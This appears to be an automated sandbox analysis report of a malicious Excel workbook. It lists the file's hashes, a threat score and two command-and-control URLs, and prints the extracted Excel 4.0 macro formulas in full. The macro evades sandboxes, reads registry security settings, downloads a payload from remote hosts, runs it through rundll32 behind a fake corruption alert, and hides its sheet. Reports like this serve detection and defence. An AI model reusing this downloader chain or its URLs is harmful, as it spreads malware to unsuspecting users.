General

  • Target

    2c6de793afa51e0f3a81d3c517b4d3babe74a05a.xls

  • Size

    205KB

  • MD5

    18f5c436d4f62ae1398c10dbcbdf401d

  • SHA1

    2c6de793afa51e0f3a81d3c517b4d3babe74a05a

  • SHA256

    833d437da7afdaa0195adb30f8318a2256a827744398d7fe4d026f3bfddd2137

  • SHA512

    e263b51dd516e6fc2a0746c4327455f1a8fa986f69999daf16a4ee4442b35c63ff3f8d300f24f3998b7306515897855e592ea4d01f66fab5f9ba06c071ddf1fc

  • SSDEEP

    6144:Lk3hbdlylKsgqopeJBWhZFVE+W2NdAgl8NiiLlUNe65x3Z1YQpeX+3Mt:qGI7JhbYQpA+8t

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://assemble.sg/wp-frunt.php

https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php

Attributes
  • formulas

    =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE)) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5) =WAIT(0+"00:00:03") =FOPEN("c:\users\public\1.reg") =FPOS(R8,215) =FREAD(R8,255) =FCLOSE(R8) =FILE.DELETE("c:\users\public\1.reg") =IF(ISNUMBER(SEARCH("0001",R10)),CLOSE(FALSE),) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-frunt.php","c:\Users\Public\c6wga5ef.html",0,0) =IF(R15<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php","c:\Users\Public\c6wga5ef.html",0,0),) =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6wga5ef.html,DllRegisterServer",0,5) =CLOSE(FALSE) =WORKBOOK.HIDE("LkahPm1nxt",TRUE)

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 2c6de793afa51e0f3a81d3c517b4d3babe74a05a.xls
    .xls windows office2003